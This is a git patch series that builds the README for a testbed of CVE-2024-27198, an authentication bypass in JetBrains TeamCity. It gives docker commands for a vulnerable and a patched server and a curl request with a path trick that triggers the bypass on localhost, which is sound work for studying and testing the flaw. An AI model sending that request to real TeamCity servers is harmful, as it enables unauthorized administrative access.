From 31e617d95dcf29918e2f97491fedff4a3a1fee07 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Furkan=20G=C3=B6ksel?= Date: Thu, 9 Oct 2025 20:15:55 +0300 Subject: [PATCH 1/7] Add testbed for CVE-2024-27198 --- jetbrains/teamcity/CVE-2024-27198/README.md | 34 +++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 jetbrains/teamcity/CVE-2024-27198/README.md diff --git a/jetbrains/teamcity/CVE-2024-27198/README.md b/jetbrains/teamcity/CVE-2024-27198/README.md new file mode 100644 index 00000000..6b9f6e32 --- /dev/null +++ b/jetbrains/teamcity/CVE-2024-27198/README.md @@ -0,0 +1,34 @@ +# JetBrains TeamCity CVE-2024-27198 + +This directory contains the deployment config for JetBrains TeamCity instances vulnerable and fixed to CVE-2024-27198. In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions is possible. + +## How to Trigger the Vulnerability? + +To trigger the vulnerability, you can use the following curl command. Since this vulnerability is an authentication bypass vulnerability, you should see the version info (like `version="2023.11.3 (build 147512)" versionMajor="2023" versionMinor="11"`) in the response for vulnerable instances. + +Curl Request: + +```sh +curl "http://localhost:8111/hax?jsp=/app/rest/server;.jsp" -H "Accept: */*" +``` + +In case you cannot trigger the vulnerability, you might need to delete your existing container images because Docker might try to reuse them. + +```sh +sudo docker rmi -f $(sudo docker images -aq) +sudo docker remove $(sudo docker ps -a -q) +``` + +## Fixed version +```sh +docker run -it -d --name teamcity-fixed -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.4 +``` + +The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin user. Just proceeding with the default options is enough. + +## Vulnerable version +```sh +docker run -it -d --name teamcity-vuln -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3 +``` + +The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin user. Just proceeding with the default options is enough. From 8c8b3f9bc4f426c5dbd2385ff6a763bf260ea422 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Furkan=20G=C3=B6ksel?= Date: Thu, 9 Oct 2025 20:21:23 +0300 Subject: [PATCH 2/7] Update README.md --- jetbrains/teamcity/CVE-2024-27198/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/jetbrains/teamcity/CVE-2024-27198/README.md b/jetbrains/teamcity/CVE-2024-27198/README.md index 6b9f6e32..a2ca8447 100644 --- a/jetbrains/teamcity/CVE-2024-27198/README.md +++ b/jetbrains/teamcity/CVE-2024-27198/README.md @@ -1,6 +1,6 @@ # JetBrains TeamCity CVE-2024-27198 -This directory contains the deployment config for JetBrains TeamCity instances vulnerable and fixed to CVE-2024-27198. In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions is possible. +This directory contains the deployment config for JetBrains TeamCity instances vulnerable and fixed to CVE-2024-27198. In JetBrains TeamCity before 2023.11.4 authentication bypass allows users to perform administrative actions. ## How to Trigger the Vulnerability? @@ -24,11 +24,11 @@ sudo docker remove $(sudo docker ps -a -q) docker run -it -d --name teamcity-fixed -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.4 ``` -The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin user. Just proceeding with the default options is enough. +The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin account credential. Just proceeding with the default options is enough. ## Vulnerable version ```sh docker run -it -d --name teamcity-vuln -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3 ``` -The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin user. Just proceeding with the default options is enough. +The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin account credential. Just proceeding with the default options is enough. From a47138e791048fce9b3c39c081912df8f26e4dcc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Furkan=20G=C3=B6ksel?= Date: Fri, 14 Nov 2025 10:42:28 +0300 Subject: [PATCH 3/7] Update jetbrains/teamcity/CVE-2024-27198/README.md Co-authored-by: Giacomo Coluccelli --- jetbrains/teamcity/CVE-2024-27198/README.md | 8 -------- 1 file changed, 8 deletions(-) diff --git a/jetbrains/teamcity/CVE-2024-27198/README.md b/jetbrains/teamcity/CVE-2024-27198/README.md index a2ca8447..f00b1c9a 100644 --- a/jetbrains/teamcity/CVE-2024-27198/README.md +++ b/jetbrains/teamcity/CVE-2024-27198/README.md @@ -11,14 +11,6 @@ Curl Request: ```sh curl "http://localhost:8111/hax?jsp=/app/rest/server;.jsp" -H "Accept: */*" ``` - -In case you cannot trigger the vulnerability, you might need to delete your existing container images because Docker might try to reuse them. - -```sh -sudo docker rmi -f $(sudo docker images -aq) -sudo docker remove $(sudo docker ps -a -q) -``` - ## Fixed version ```sh docker run -it -d --name teamcity-fixed -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.4 From 1afef96de15b0ca2d486ac5e87be98ef9921a911 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Furkan=20G=C3=B6ksel?= Date: Fri, 14 Nov 2025 10:43:04 +0300 Subject: [PATCH 4/7] Update jetbrains/teamcity/CVE-2024-27198/README.md Co-authored-by: Giacomo Coluccelli --- jetbrains/teamcity/CVE-2024-27198/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/jetbrains/teamcity/CVE-2024-27198/README.md b/jetbrains/teamcity/CVE-2024-27198/README.md index f00b1c9a..015f004c 100644 --- a/jetbrains/teamcity/CVE-2024-27198/README.md +++ b/jetbrains/teamcity/CVE-2024-27198/README.md @@ -13,7 +13,7 @@ curl "http://localhost:8111/hax?jsp=/app/rest/server;.jsp" -H "Accept: */*" ``` ## Fixed version ```sh -docker run -it -d --name teamcity-fixed -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.4 +docker run -it --rm --name teamcity-fixed -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.4 ``` The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin account credential. Just proceeding with the default options is enough. From 5362cf6d017e0c12bb08128b7597d2fd7da2b302 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Furkan=20G=C3=B6ksel?= Date: Fri, 14 Nov 2025 10:43:11 +0300 Subject: [PATCH 5/7] Update jetbrains/teamcity/CVE-2024-27198/README.md Co-authored-by: Giacomo Coluccelli --- jetbrains/teamcity/CVE-2024-27198/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/jetbrains/teamcity/CVE-2024-27198/README.md b/jetbrains/teamcity/CVE-2024-27198/README.md index 015f004c..93495b23 100644 --- a/jetbrains/teamcity/CVE-2024-27198/README.md +++ b/jetbrains/teamcity/CVE-2024-27198/README.md @@ -20,7 +20,7 @@ The deployed service listens on `localhost:8111` after the docker completes its ## Vulnerable version ```sh -docker run -it -d --name teamcity-vuln -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3 +docker run -it --rm --name teamcity-vuln -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3 ``` The deployed service listens on `localhost:8111` after the docker completes its job. For the first time, you need to visit the `http://localhost:8111/` to setup and determine an admin account credential. Just proceeding with the default options is enough. From fd37c1b059e7235e3c62a699219df402edd0b560 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Furkan=20G=C3=B6ksel?= Date: Fri, 14 Nov 2025 10:43:39 +0300 Subject: [PATCH 6/7] Update jetbrains/teamcity/CVE-2024-27198/README.md Co-authored-by: Giacomo Coluccelli --- jetbrains/teamcity/CVE-2024-27198/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/jetbrains/teamcity/CVE-2024-27198/README.md b/jetbrains/teamcity/CVE-2024-27198/README.md index 93495b23..f0715392 100644 --- a/jetbrains/teamcity/CVE-2024-27198/README.md +++ b/jetbrains/teamcity/CVE-2024-27198/README.md @@ -9,7 +9,7 @@ To trigger the vulnerability, you can use the following curl command. Since this Curl Request: ```sh -curl "http://localhost:8111/hax?jsp=/app/rest/server;.jsp" -H "Accept: */*" +curl -v "http://localhost:8111/hax?jsp=/app/rest/server;.jsp" -H "Accept: */*" ``` ## Fixed version ```sh From eddfdfd166d215d0742e9edb7a8184ed91ac8413 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Furkan=20G=C3=B6ksel?= Date: Fri, 14 Nov 2025 10:44:03 +0300 Subject: [PATCH 7/7] Update jetbrains/teamcity/CVE-2024-27198/README.md Co-authored-by: Giacomo Coluccelli --- jetbrains/teamcity/CVE-2024-27198/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/jetbrains/teamcity/CVE-2024-27198/README.md b/jetbrains/teamcity/CVE-2024-27198/README.md index f0715392..f7619e83 100644 --- a/jetbrains/teamcity/CVE-2024-27198/README.md +++ b/jetbrains/teamcity/CVE-2024-27198/README.md @@ -1,6 +1,6 @@ # JetBrains TeamCity CVE-2024-27198 -This directory contains the deployment config for JetBrains TeamCity instances vulnerable and fixed to CVE-2024-27198. In JetBrains TeamCity before 2023.11.4 authentication bypass allows users to perform administrative actions. +These are the deployment instructions for JetBrains TeamCity - CVE-2024-27198 testbed. Versions prior to 2023.11.4 are affected by an authentication bypass vulnerability that allows attackers to perform administrative actions. ## How to Trigger the Vulnerability?